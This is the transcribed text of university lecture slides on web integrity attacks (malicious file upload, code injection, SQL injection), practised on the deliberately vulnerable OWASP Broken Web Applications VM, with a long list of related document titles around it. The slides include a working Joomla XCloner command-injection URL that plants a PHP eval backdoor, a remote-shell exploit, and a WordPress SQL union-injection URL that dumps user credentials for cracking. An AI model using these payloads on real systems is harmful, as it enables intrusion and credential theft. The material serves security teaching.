Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

Similar documents
(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

Integrity attacks (from data to code): Cross-site Scripting - XSS

Web Application Vulnerabilities: OWASP Top 10 Revisited

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

NET 311 INFORMATION SECURITY

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Web Application Security. Philippe Bogaerts

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Security Course. WebGoat Lab sessions

CSCE 813 Internet Security Case Study II: XSS

Lecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing

WebGoat Lab session overview

Introduction to Ethical Hacking

Chrome Extension Security Architecture

A4: Insecure Direct Object References

Solution of Exercise Sheet 5

P2_L12 Web Security Page 1

Your Turn to Hack the OWASP Top 10!

WebGoat& WebScarab. What is computer security for $1000 Alex?

IERG 4210 Tutorial 07. Securing web page (I): login page and admin user authentication Shizhan Zhu

Authentication and Password CS166 Introduction to Computer Security 2/11/18 CS166 1

Application vulnerabilities and defences

CS 155 Project 2. Overview & Part A

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

CIS 4360 Secure Computer Systems XSS

CSE 127 Computer Security

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Solutions Business Manager Web Application Security Assessment

Exploiting and Defending: Common Web Application Vulnerabilities

Web Security II. Slides from M. Hicks, University of Maryland

Web Security: Vulnerabilities & Attacks

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

C1: Define Security Requirements

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Web Application Whitepaper

COMP9321 Web Application Engineering

Certified Secure Web Application Engineer

Sichere Software vom Java-Entwickler

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

CyberP3i Hands-on Lab Series

Metasploit. Installation Guide Release 4.4

Web Application Security GVSAGE Theater

IronWASP (Iron Web application Advanced Security testing Platform)

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

An analysis of security in a web application development process

Security. CSC309 TA: Sukwon Oh

CSWAE Certified Secure Web Application Engineer

eb Security Software Studio

Getting Ready. I have copies on flash drives Uncompress the VM. Mandiant Corporation. All rights reserved.

AppSpider Enterprise. Getting Started Guide

Web Security, Part 2

WHY CSRF WORKS. Implicit authentication by Web browsers

Copyright

Web Application Penetration Testing

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

All India Council For Research & Training

LECT 8 WEB SECURITY BROWSER SECURITY. Repetition Lect 7. WEB Security

CS 410/510: Web Security X1: Labs Setup WFP1, WFP2, and Kali VMs on Google Cloud

Web Attacks Lab. 35 Points Group Lab Due Date: Lesson 16

OWASP Broken Web Application Project. When Bad Web Apps are Good

CNIT 129S: Securing Web Applications. Ch 8: Attacking Access Controls

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild

Web Penetration Testing

Threat Landscape 2017

Application Layer Security

CS 161 Computer Security

Web Security: Loose Ends

CSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

1 About Web Security. What is application security? So what can happen? see [?]

Web Security. Web Programming.

PHP and MySQL Programming

Web Application Attacks

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

Injecting Security Controls into Software Applications. Katy Anton

Hackveda Training - Ethical Hacking, Networking & Security

Featuring. and. Göteborg. Ulf Larson Thursday, October 24, 13

Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion

CSCE 548 Building Secure Software SQL Injection Attack

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

IS 2150 / TEL 2810 Introduction to Security

MRG Effitas Trapmine Exploit Test

I n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures:

Advanced Joomla! Dan Rahmel. Apress*

Bank Infrastructure - Video - 1

WorldNow Producer. Requirements Set-up

OWASP TOP 10. By: Ilia

Hacking Our Way to Better Security: Lessons from a Web Application Penetration Test. Tyler Rasmussen Mercer Engineer Research Center

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

WatchGuard AP - Remote Code Execution

DevShala Technologies A-51, Sector 64 Noida, Uttar Pradesh PIN Contact us

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Automatically Checking for Session Management Vulnerabilities in Web Applications

Applications Security

Transcription:

Pattern Recognition and Applications Lab Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection Igino Corona igino.corona _at_ diee.unica.it Computer Security May 2nd, 2017 Department of Electrical and Electronic Engineering University of Cagliari, Italy 1

Pratical session We will focus on most common Integrity vulnerabilities that allow an attacker to convert data into code A1-2013 Injection» SQL» Code A3-2013 Cross-site Scripting (XSS)» Server-side, client-side, reflected, persistent Authentication vulnerabilities that allow an attacker to impersonate a user collect confidential information Some real cases of well-known web services in production 2

Pratical session OWASP Broken Web Applications Project https://www.owasp.org/index.php/owasp_broken_web_applications_project The VM can be dowloaded from the following link https://sourceforge.net/projects/owaspbwa/files/1.2/owasp_broken_web_apps_vm_1.2. ova/download 3

Pratical Session Integrity Vulnerabilities 4

A6-2010 Malicious File Execution Targets: file (up)load routine of the web application Interpreter: web application server (typically) An insecure handling of external/uploaded files, allows the attacker to convert input data into (arbitrary) application code Flash Silverlight PDF Reader External file Images JavaScript CSS (up)load routine HTML Application Database HTTP(S) Client HTTP(S) server 5

OWASP WebGoat Very useful training application by OWASP Let s exploit a malicious file execution vulnerability to get access to the webserver s filesystem! User: root Pwd: owaspbwa 6

OWASP WebGoat From the left menu Malicious Execution->Malicious File Execution The page allows one to upload/display (read) an image 7

OWASP WebGoat Let s use a tool like Live HTTP Headers (Firefox) To understand what is the backend web application interpreter Our first guess is that there is a JavaServer Pages (JSP) interpreter 8

OWASP WebGoat In JSP (like PHP), programs are written within files that are read and interpreted at runtime Any file with a name which ends with a specific extension (e.g.,.jsp) is executed by the interpreter Key security question: does the application checks the extension and content of the uploaded files? Let s try to upload a file browser program written in JSP http://www.vonloesch.de/files/browser.zip 9

OWASP WebGoat Oh we were able to upload the JSP file... Let s execute it (right click, view image) 10

OWASP WebGoat Oh... The JSP file is actually executed and give us a full-featured file browser with read/write permissions on the filesystem! 11

Code Injection Targets: web application routines Interpreter: application server (typically) An insecure separation between input data and code in web applications allow the attacker to inject (arbitrary) instructions Flash Silverlight PDF Reader JavaScript Images CSS HTML Application Database HTTP(S) Client HTTP(S) server 12

From Data to Application Code - Joomla Let s play with Joomla 13

From Data to Application Code - Joomla OK, it appears that Joomla has Plugin Xcloner 2.1 installed 14

From Data to Application Code - Joomla Let s find a suitable exploit 15

From Data to Application Code - Joomla Xcloner 2.1 OWASP TOP A1-2013 Found Command Injection exploit for plugin XCloner 2.1 https://www.exploit-db.com/exploits/16246/ 16

Joomla Xcloner 2.1 Command Injection We may inject (stored in the configuration) arbitrary PHP code through the attribute output_url_pref and suitable value for task and output path http://localhost/joomla/administrator/components/com_xclonerbackupandrestore/restore/xcloner.php? task=step2&output_url_pref=';+}+?>+<?php+eval($_get['lol']);+? >&output_path=../../../../ Then we can inject arbitrary commands through the malicious parameter lol, e.g., http://localhost/joomla/?lol=phpinfo(); 17

Joomla Xcloner 2.1 Remote Shell There is also a more user-friendly implementazion of the exploit that returns a remote shell! $ python 16246.py -t localhost -d /joomla/ injects the Nice! following How malicious does it work? code in the config: ----------------------------------------------------------------------------- Joomla component (com_xcloner-backupandrestore) remote execution explo!t '; }?> <?php eval(base64_decode($_cookie['lol']));?> by mr_me - net-ninja.net ---------------------------------------------------- (+) sends Targeting a command http://localhost/joomla/ through the lol cookie parameter (!) Exploit working! system( <shell string> ) (+) Droping to remote console (q for quit) retrieves and displays the output user@localhost# ls CHANGELOG.php COPYRIGHT.php CREDITS.php 18

A1 2013 - SQL Injection Targets: insecure API between web application and database Interpreter: DataBase backend An insecure API between Application and Database allows the attacker to convert input data into (arbitrary) DB Queries Flash Silverlight PDF Reader Database Images JavaScript CSS HTML Application DB access API HTTP(S) Client HTTP(S) server 19

Wordpress Let s play with Wordpress 20

Wordpress OK, it appears that we are in front of WP 2.0 Plugin Spreadsheet v0.6 as well as MyGallery 1.2.1 installed 21

Wordpress Let s find a suitable exploit 22

Wordpress OWASP TOP A1-2013 Found SQL Injection exploit for plugin spreadsheet v.0.6 https://www.exploit-db.com/exploits/5486/ 23

Wordpress You may launch the exploit using your browser http://localhost/wordpress/wpcontent/plugins/wpss/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat (user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users-- &display=plain password hash NOTE: no errors on the DB side. Why? Because we injected the SQL query so that it generates one more row, - containing exactly the expected number of columns (4 in this case) - putting in the string field (n. 2) the char-separated (0x3a) concatenation of desired info (user_login, user_pass, user_email) 24

Wordpress Let s find out the password through bruteforce We can use an online webservice https://crackstation.net In a more realistic case, attackers may use offline tools such a John The Ripper http://www.openwall.com/john/ 25

Wordpress Now that we have both username and password The login URL for wordpress is at /wp-login.php 26

Wordpress We are in (with administrative privileges) The website is now 0wned by us (the end) 27

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback